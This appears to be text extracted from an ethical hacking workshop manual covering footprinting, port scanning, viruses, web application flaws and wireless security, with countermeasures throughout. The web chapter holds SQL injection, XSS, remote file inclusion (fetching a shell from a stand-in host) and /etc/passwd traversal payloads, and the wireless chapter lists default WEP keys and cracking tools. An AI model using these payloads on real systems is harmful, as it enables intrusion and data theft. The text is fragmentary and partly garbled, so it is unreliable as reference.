TechDefence Workshop Final
TechDefence Workshop Final
By
Sunny Vaghela
www.sunnyvaghela.com
Head Office: A 805 Wallstreet 2,Opp Orient Club,Near Gujarat College,Ahmedabad 380007
Office: +91 79 40047405 , Mobile: +91 9898493002
Website: www.techdefence.com Email: [email protected]
India Branch Offices: Vallabh Vidyanagar,Rajkot,Himmatnagar,Nashik,Hyderabad
International Offices: Australia, Mauritius
1
INDEX
Sr No.
Title
Ethical Hacking
1.1
Cyber Ethics
1.2
Information Gathering
1.3
Scanning
17
22
Page No.
27
29
30
2.4
31
2.5
Security guidelines
44
Wireless Standards
47
3.2
55
3.3
56
CHAPTER 1
Ethical Hacking
1.1
Cyber Ethics
1.2
Information Gathering
1.3
Scanning
1.4
1.1
CYBER ETHICS
Cyber ethics is a code of behavior for using the Internet. Since we are going to view
it as the hackers prospective, we will first dissect what the word hacker stands for?
Hacker:
A person, who delights in having an intimate understanding of the internal workings
of a system, computers and computer networks in particular. It is used to refer to someone
skilled in the use of computer systems, especially if that skill was obtained in an exploratory
way. The term is often misused in a pejorative context, where "cracker" would be the
correct term. And due to that the term evolved to be applied to individuals, with or without
skill, who break into security systems. Several subgroups of the computer are underground
with different attitudes and aims use different terms to demarcate themselves from each
other, or try to exclude some specific group with which they do not agree. In hackers
culture there are many different categories, such as white hat (ethical hacking), grey hat,
black hat and script kiddies. Usually the term cracker refers to black hat hackers, or more
generally hackers with unlawful intentions.
1. White Hat
A white hat is the hero or good guy, especially in computing slang, where it refers to an
ethical hacker or Penetration tester who focuses on securing and protecting IT systems.
White Hat Hackers, also known as Ethical Hackers, are Computer Security experts, who are
specialized in penetration testing, and other testing methodologies, to ensure that a
company's information systems are secure. Such people are employed by companies where
these professionals are sometimes called sneakers, tiger teams or red teams.
2. Grey Hat
A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts
legally, sometimes in good will, and sometimes not. They are a hybrid between white and
black hat hackers. They usually do not hack for personal gain or have malicious intentions,
but may or may not occasionally commit crimes during the course of their technological
4
exploits.
3. Black Hat
A black hat is the villain or bad guy. It refers to a hacker that breaks into networks or
computers, or creates computer viruses. Black Hat Hackers (also called "crackers") who
are specialized in unauthorized penetration of information systems. They may use
computers to attack systems for profit, for fun, or for political motivations or as a part of a
social cause. Such penetration often involves modification and/or destruction of data, and
is done without authorization and hence they should not be confused with ethical hackers.
4. Phreaker
Phreaking is a slang term coined to describe the activity of a subculture of people who
study, experiment with, or explore telecommunication systems, like equipment and systems
connected to public telephone networks. As telephone networks have become
computerized, Phreaking has become closely linked with computer hacking. This is
sometimes called the H/P culture (with H standing for Hacking and P standing for
Phreaking). The term "phreak" is a mixture of the words "phone" and "freak", and may also
refer to the use of various audio frequencies to manipulate a phone system. "Phreak",
"phreaker", or "phone phreak" are names used for and by individuals who participate in
phreaking.
5. Script Kiddies
In hacker culture, a script kiddie, occasionally script bunny, skiddie, script kitty, scriptrunning juvenile (SRJ), or similar, is a derogatory term used to describe those who use
scripts or programs developed by others to attack computer systems and networks.
It is generally assumed that script kiddies are like amateur kids who lack the ability to write
sophisticated hacking programs or exploits on their own, and that their objective is to try to
impress their friends or gain credit in underground hacker communities.
6.Hacktivists
Some people describing themselves as hacktivists have taken to defacing websites for
political reasons, such as attacking and defacing government websites as well as web sites
of groups who oppose their ideology. Hacktivist is a mixture of the words Hacker and
Activist. Their activities include many political ideals and issues. Hacktivism is a
5
controversial term. Some argue it was coined to describe how electronic direct action might
work toward social change by combining programming skills with critical thinking. Others
use it as practically synonymous with malicious, destructive acts that undermine the
security of the Internet as a technical, economic, and political platform.
Scanning:- Scanning the target system for open ports and services running on
the open ports etc.
Gaining Access:- Gaining the actual access of the particular target system by
exploiting the system.
Maintaining Access:- Keeping the access of the system even after leaving
the system so as not to perform all the steps from the scratch.
1.2
Information Gathering
Footprinting is required to ensure that isolated information repositories that are critical to
the attack are not overlooked or left undiscovered. Footprinting merely comprises on aspect
of the entire information gathering process, but is considered one of the most important
stages of a mature hack.
Attacker will take 90% of time in information gathering & only 10% of time while
attacking & gaining an access to the system
Investigators Point of view:
Investigator will gather initial information like traces of criminal on an internet, about his
name, occupation, address, contact number about his/her company/organization before
taking any legal action.
This will help investigator to profile the criminal & his/her activities properly during
interrogation.
Attacker will gather information about the system, operating system, about vulnerable
application running on them & later on exploit it.
Investigator will gather information on how he got an access to system & where he left
his/her footprint behind on the same system & later on traced it.
Search engine are most powerful tool to search about any individual, organization & system
Maltego
Maltego is an open source intelligence and forensics application. It allows for the mining
and gathering of information as well as the representation of this information in a
meaningful way.Coupled with its graphing libraries, Maltego, allows you to identify key
relationships between information and identify previously unknown relationships between
them. It is a must-have tool in the forensics.security and intelligence fields! Maltego offers
the user with unprecedented information. Information is leverage.
People Search Investigator can find personal information using people search.
9
People search will give information about phone number, address as well as background
info about the organizations.
Intellius:
Whois Lookup:
WHOIS (pronounced "who is"; not an acronym) is a query/response protocol which is
widely
used for querying an official database in order to determine the owner of a domain
based tools now exist for looking up domain ownership details from different databases.
Web-based WHOIS clients still rely on the WHOIS protocol to connect to a WHOIS server
and do lookups, and command-line WHOIS clients are still quite widely used by system
administrators. WHOIS normally runs on TCP port 43.
Presently ICANN is undertaking a study to determine the uses and abuses of WHOIS
information. Other studies that are ongoing concern the accuracy of WHOIS information,
and the
information.
The records of each of these registries are cross-referenced, so that a query to ARIN for a
record which belongs to RIPE will return a placeholder pointing to the RIPE WHOIS
server. This lets the WHOIS user making the query know that the detailed information
resides on the RIPE server. Apart from the RIRs mentioned above, there is also a
commercial global service: Routing Assets Database used by some large networks (eg.
large internet providers that acquired other ISPs in several RIR areas).
Domain Tools:
Whois.net
11
Samspade.org
.In registry
\
Example: www.techdefence.com whois info using www.domaintools.com
Above picture indicates that the website www.techdefence.com has title TechDefence
Consulting. Its Search Engine Optimization score is 62% for 23 terms.
12
Server Data is apache that means LINUX is operating system which is running on
techdefence
server.
Registrant:
TechDefence Consulting Pvt Ltd
Sunny Vaghela
Ahmedabad
Ahmedabad
Gujarat,380007
INDIA
Tel. +91.7926631931
The above information tells that domain techdefence.com is registered by Sunny Vaghela
from Ahmedabad.
13
Reverse IP Mapping:
Reverse IP mapping is the method to find number of websites hosted on same server.
Here by selecting the Reverse IP link we can get list of websites hosted on 208.43.231.66
along with techdefence.com
Trace Route:
Traceroute gives useful information regarding number of servers between your computers
& remote computers.
Visualroute, Neotrace.
NeoTrace gives MAP view,Node View as well as List View of number of nodes between
your computer & remote computer.
MAP View for www.techdefence.com
14
Geowhere:
Find websites using popular news groups.also finds out mailing lists,news groups & extract
information from 20 search engines.
15
Email Spiders
Email Spiders are automated softwares which captures email ids using spiders & store them
on the database. Spammers are using email spiders to collect thousand emails for spamming
purposes.
1.3
Scanning
Many time ago we scanned the different ports making telnet manually. Today
people use more sophisticated programs with massive methods to scan IP ranges searching
a lot of ports.
Scanning is the process of finding out open/close ports, vulnerabilities in remote system,
server & networks. Scanning will reveal IP addresses, Operating systems, Services running
on remote computer.
There are three types of scanning.
1. Port Scanning
2. Network Scanning
3. Vulnerability Scanning
Port Scanning:
Port Scanning is one of the most popular technique attacker use to discover the service they
break into.
All machines connected to a LAN or connected to Internet via a modem run many
services that listen at well-known and not so well-known ports.
Ports: The port numbers are unique only within a computer system.
echo
7/tcp
Echo
ftp-data
20/udp
ftp
21/tcp
ssh
22/tcp
telnet
23/tcp
Telnet
domain
53/udp
www-http 80/tcp
Smtp
25/tcp
Whois
43/tcp
whois server
Registered Ports:
wins
1512/tcp
radius
1812/udp
yahoo
5010
x11
Yahoo! Messenger
ACK
RST
PSH
URG
FIN
TTL
WINDOW
URG urgent stats that data contain in packet should be process immediately.
FIN finish tells remote system that there will be no more transmission.
Open Scan
Known as TCP Scan and normally used to program sockets, this technique is the oldest and
works making a full connection with the server.
18
TCPConnect()
If the port is listening, connect() will succeed, otherwise the port isn't reachable.
Stealth Scan:
Fragmented Scan: The scanner splits the TCP header into several IP fragments.
This bypasses some packet filter firewalls because they cannot see a complete TCP
header that can match their filter rules.
SYN Scan:
This technique is called half open scanning because a TCP connection is not
completed .
19
the target host responds with a SYN+ACK, this indicates the port is listening and an
RST indicates a non- listener.
FIN Scan:
Another technique sends erroneous packets at a port, expecting that open listening
ports will send back different error messages than closed ports.
XMAS Scan:
XMAS uses scans where all flags in the TCP packet are set & sent to target host.
NULL Scan:
Null Scan used no flags of TCP header & it sent to the target host.
It can carry out SYN Scan, FIN Scan, Stealth Scan, Half open scan & many other
types.
21
1.4
Spyware
Spyware is a piece of software that gets installed on computer without your consent. It
collects your personal information without you being aware of it. It also Change how your
computer or web browser is configured and bombard you with online advertisements.
Spyware programs are notorious for being difficult to remove on your own and slow down
your PC. A program gets installed in the background while you are doing something else on
Internet.Spware has fairly widespread because your cable modem or DSL connection is
always connected.
22
Virus Properties
Your computer can be infected even if files are just copied
Can be Polymorphic.
Can be memory or non-memory resident
Can be a stealth virus
Viruses can carry other viruses
Can make the system never show outward signs
Can stay on the computer even if the computer is formatted.
Virus Indications
Following are some of the common indications of Virus when it infects system.
Files have strange name than the normal.
File extensions can also be changed.
Program takes longer time to load than the normal.
Computers hard drives constantly runs out of free space
23
Virus Types
Following are some of the common indications of Virus when it infects system.
Macro Virus Spreads & Infects database files.
File Virus Infects Executables.
Source Code Virus Affects & Damage source code.
Network Virus Spreads via network elements & protocols.
Boot Virus Infects boot sectors & records.
Shell Virus Virus Code forms shell around target hosts genuine program & host it as
sub routine.
Terminate & stay resident virus remains permanently in the memory during the work
session even after target host is executed & terminated.
3.
4.
24
Bait files (or goat files) are files that are specially created by anti-virus software, or by
anti-virus professionals themselves, to be infected by a virus.
Many anti-virus programs perform an integrity check of their own code.
Infecting such programs will therefore increase the likelihood that the virus is
detected.
Anti-virus professionals can use bait files to take a sample of a virus
6.
7.
Virus Analysis
1.
25
Autoruns :
Process Explorer
26
CHAPTER 2
Web Application
Hacking & Security
2.1
2.2
Security Misconceptions
2.3
2.4
2.5
Security guidelines
2.6
27
2.1
Problem Illustration
Application Layer
Attacker sends attacks inside valid HTTP requests.
Your custom code is tricked into doing something it should not.
Security requires software development expertise, not signatures.
Network Layer
Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks
inside HTTP requests.
Security relies on signature databases
28
Access to the server through ports 80 and 443 makes the web server part of your
external perimeter defense.
Attack signatures do not include those for attacks against custom applications.
SSL secures the transport of data between the web server and the users browser.
SSL does not protect against attacks against the server and applications.
SSL is the hackers best friend due to the false sense of security.
29
Vulnerability Used
30
1. INJECTION FLAWS
Injection means
Interpreters
INJECTION FLAWS
31
SQL INJECTION
Even worse, a lot of solutions posted on the Internet are not good enough.
In our pen tests over 60% of our clients turn out to be vulnerable to SQL
Injection
var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND
password = '" + formpwd + "'";
formpwd = anything
32
THE POWER OF
$formacct = 1 or 1=1 #
$formpin = 1111
Final query would look like this:
accomplish
www.site.com/news.asp5ArticleID=10,
The link tells the site to look in the table that stores
the article names for an article whos "ArticleID" is
10.
The "INFORMATION_SCHEMA" holds the names of every table and column on a site.
On every SQL server there will be an "INFORMATION_SCHEMA" and its name will
never change.
Example : www.site.com/index.php5id=1
Example : www.site.com/index.php5id=1+order+by+1 --
www.site.com/index.php5id=1+union+all+select+1,table_name,3,4,5,6,7+from+informati
on_schema.tables
www.site.com/index.php5id=1+union+all+select+1,column_name+3,4,5,6,7+from+infor
mation_schema.columns+where+table_schema=char()
The above mentioned query gives names of columns stored of all tables
Input Validation
to
store it
For example: reject "select", "insert", "update", "shutdown", "delete", "drop", "--",
"'"
Raw data
Stored in database
Reflected from web input (form field, hidden field, url, etc)
access to
Stored XSS
Reflected XSS
36
Finding XSS
Most Common Blogs, Forums, Shout boxes, Comment Boxes, Search Box's, there
are too many to mention.
XSS Examples
http://site.com/search.php5q=<script>alert("XSS")</script>
http://site.com/search.php5q=<script>window.open(
"http://www.google.com/"
)</script>
Finding XSS
Fixing XSS
If you found XSS bugs in your scripts, its easy to secure, take a look at the below
code.
37
if(isset($_POST['form'])){echo
"<html><body>"
.$_POST['form'].
"</body></html>";}
Here the variable $_POST['from'] was coming from a input box, then you have a
XSS attack.
This will take all possible code and make it not executable. by turning it into stuff
like < etc...
$this = $_GET['id'];
If we include 5id=<script>alert("XSS")</script>
into the url its going to execute our code, a very easy way to secure this is using
(int) check the following code
$this = (int)$_GET['id'];
Developers will often directly use or concatenate potentially hostile input with file
or stream functions, or improperly trust input files.
On many platforms, frameworks allow the use of external object references, such
as URLs or file system references.
When the data is insufficiently checked, this can lead to arbitrary remote and
hostile content being included, processed or invoked by the web server.
38
You only need to load by GET or POST directly to an URI with the shell (using a
non PHP extension):
Like http://www.techdefence.com/index.php5page=news.php
<?php
include($_GET[page]);
?>
http://www.techdefence.com/index.php5page=http://www.evilscript.com/shell.txt
Fixing RFI
Filter all the pages and Give file permissions perfectly so that no one can access.
Websites often use an include() system to display their pages, even more often this
system is insecure.
The simplest way to see if a script is vulnerable to local file inclusion, is this:
index.php5page=../../../../../../../../../etc/passwd
That Shows the complete User information in that server with paths..
Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.
The result is
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
Avoid exposing your private object references to users whenever possible, such as
primary keys or filenames.
Applications can also leak internal state via how long they take to process certain
operations or via different responses to differing inputs, such as displaying the
same error text with different error numbers.
Web applications will often leak information about their internal state through
detailed or debug error messages.
isAuthenticated()
isAuthorized()
isValid()
if (!security_test())
then return false
return true
if (security_test())
then return true
return false
Flaws in this area most frequently involve the failure to protect credentials and
session tokens through their lifecycle.
Attacker Can..
Fixing BA & SM
Do not expose any session identifiers or any portion of valid credentials in URLs
or logs.
42
Frequently, the only protection for a URL is that links to that page are not
presented to unauthorized users.
However, a motivated, skilled, or just plain lucky attacker may be able to find and
access these pages, invoke functions, and view data.
Ensure the access control matrix is part of the business, architecture, and design of
the application
Ensure that all URLs and business functions are protected by an effective access
control mechanism.
Do not assume that users will be unaware of special or hidden URLs or APIs
43
All user input and user output should be checked to ensure it is both appropriate
and expected.
Allow only explicitly defined characteristics and drop all other data.
Fail Securely
Keep It Simple
If a security system is too complex for its user base, it will either not be used or
users will try to find measures to bypass it.
This message applies equally to tasks that an administrator must perform in order
to secure an application.
This message is also intended for security layer API's that application developers
44
Using and reusing trusted components makes sense both from a resource stance
and from a security stance.
When someone else has proven they got it right, take advantage of it.
Defence In Depth
Relying on one component to perform its function 100% of the time is unrealistic.
While we hope to build software and hardware that works as planned, predicting
the unexpected is difficult. Good systems don't predict the unexpected, but plan
for it.
Attackers are lazy and will find the weakest point and attempt to exploit it.
It's naive to think that hiding things from prying eyes doesn't buy some amount of
time.
This strategy doesn't work in the long term and has no guarantee of working in
the short term.
Least Privilege
Systems should be designed in such a way that they run with the least amount of
system privilege they need to do their job.
occur.
46
CHAPTER 3
Wireless
Hacking & Security
3.1
Wireless Standards
3.2
3.3
47
802.11b
Operates in the 2.4000 GHz to 2.2835GHz frtequency range and can operate at up to 11
megabits per second.
802.11a
802.11g
Operates in the 2.4GHz frequency range (increased bandwidth range) and can operate at
up to 54 megabits per second.
When setting up a WLAN, the channel and service set identifier (SSID) must be configured
in addition to traditional network settings such as IP address and a subnet mask.
The channel is a number between 1 and 11 (1 and 13 in Europe) and designates the
frequency on which the network will operate.
48
The SSID is an alphanumeric string that differentiates networks operating on the same
channel.
SSIDs
The SSID is a unique identifier that wireless networking devices use to establish and
maintain wireless connectivity. SSID acts as a single shared password between access points
and clients. Security concerns arise when the default values are not changed, as these units
can be easily compromised. A non-secure access mode, allows clients to connect to the
access point using the configured SSID, a blank SSID, or an SSID configured as "any."
Attackers Point of view:
If the target access point responds to a Broadcast SSID Probe, then he might just be
in luck. This is because most wireless card drivers are configured with an SSID of ANY so
that they will be able to associate with the wireless network. When the SSID is set to ANY,
the driver sends a probe request to the broadcast address with a zero-length SSID, causing
most access point that will respond to these requests to issue a response with its SSID and
info. Though this configuration makes it easier for the user, as the user does not have to
remember the SSID to connect to the wireless LAN, it makes it much simpler for attackers
to gather SSIDs. Some of the common default passwords are:
3Com AirConnect 2.4 GHz DS (newer 11mbit, Harris/Intersil Prism based)
Default SSID: 'comcomcom'
3Com other Acccess Points
Default SSID: '3com'
Addtron (Model:?)
Default SSID: 'WLAN'
Cisco Aironet 900Mhz/2.4GHz BR1000/e, BR5200/e and BR4800
49
50
Default Channel: 3
INTEL Pro/Wireless 2011 802.11 DSSS - Access Point
Default SSID: '101' ; '195'
LINKSYS WAP-11 802.11 DS Access Point
Default SSID: 'linksys'
Default Channel: 6
Default WEP key one: 10 11 12 13 14 15
Default WEP key two: 20 21 22 23 24 25
Default WEP key three: 30 31 32 33 34 35
Default WEP key four: 40 41 42 43 44 45
LINKSYS WPC-11 PCMCIA 802.11b DS 2.4 GHz - PC Card
Default SSID: 'linksys' ; 'Wireless'
Default Channel: 3 ; 6 ; 11
Netgear 802.11 DS ME102 / MA401
Default SSID: 'wireless'
Default Channel: 6
Default IP address: 192.168.0.5
Default WEP: Disabled
Default WEP KEY1: 11 11 11 11 11
51
52
Default Channel: 11
Default Admin pass: WLAN_BRIDGE
Default MAC:00:90:d1:00:b8:9c (00:90:d1:xx:xx:xx)
SOHOware NetBlaster II
Default SSID: same as mac
Default MAC:00:80:c6:xx:xx:xx
Default Channel:8
Symbol AP41x1 and LA41x1 / LA41X3 802.11 DS
Default SSID: '101
Default MAC: 00:a0:0f:xx:xx:xx
Default WEP key one: 10 1112 13 14 15
Default WEP key two: 20 21 22 23 24 25
Default WEP key three: 30 31 32 33 34 35
Default WEP key four: 40 41 42 43 44 45
TELETRONICS WL-Access Point
Default SSID: 'any'
Default Password: 1234
Console Port: No password, AT command set
Wave Lan Family
53
54
WEP
WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to
provide for confidentiality of data on wireless networks at a level equivalent to that of wired
LANs.Wired LANs typically employ physical controls to prevent unauthorized users from
connecting to the network and viewing data. In a wireless LAN, the network can be
accessed without physically connecting to the LAN. IEEE chose to employ encryption at
the data link layer to prevent unauthorized eavesdropping on a network. This is
accomplished by encrypting data with the RC4 encryption algorithm.
Deficiencies of WEP
The per packet key is constructed from IV,making it susceptible to weak key attacks.
No inbuilt provision to update key in all wireless clients connected to access point.
55
NetStumbler displays:
1. Signal Strength
2. MAC Address
3. SSID
4. Channel details
NetStumbler is a Windows-based war-driving tool that will detect wireless networks and
mark their relative position with a GPS. NetStumbler uses an 802.11 Probe Request sent to
the broadcast destination address, causing all access points in the area to issue 802.11 Probe
Response containing network configuration information, such as their SSID and WEP status.
When hooked up to a GPS, NetStumbler will record a GPS coordinate for the highest signal
strength found for each access point. Using the network and GPS data, the user can create
maps with tools such as Microsoft MapPoint.
1. AiroPeek: http://www.wildpackets.com
Airopeek is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all
higher level network protocols such as TCP/IP, Apple Talk, NetBUI and IPX. In addition,
AiroPeek quickly isolates security problems, fully decodes 802.11a and 802.11b WLAN
protocols, and analyzes wireless network performance with accurate identification of signal
strength, channel and data rates.
2. Airsnort : http://airsnort.shmoo.com/
AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates
by passively monitoring transmissions, computing the encryption key when enough packets
have been gathered. AirSnort requires approximately 5-10 million encrypted packets to be
gathered. Once enough packets have been gathered, AirSnort can guess the encryption
password in under a second
3. Kismet
Kismet is a 802.11b wireless network sniffer which separates and identifies different
wireless networks in the area. Kismet works with any wireless card which is capable of
reporting raw packets.
56
WEPCrack
WEPCrack is an open source tool for breaking 802.11 WEP secret keys. While Airsnort has
captured the media attention, WEPCrack was the first publically available code that
demonstrated the above attack.
The current tools are Perl based and are composed of the following scripts:
Countermeasures:
Usually ISP configure your phone number/mobile number as default Network Key in
Router. one should change it as soon as possible if so.
If configured as Unsecured Connection then enable the logging system. This helps
you to get MAC (Media Access Control) address of the machines which uses your
wifi router.
If configured as Unsecured Connection then bind your MAC address with the router.
This will only allow your authenticated laptops to get connected to router.
Protect Your SSIDS & Dont use WEP while isp configures ur router.
Dont ever use viral networks like "Free internet" Or "wifi" Network because those
networks are designed to steal your data from laptop.
57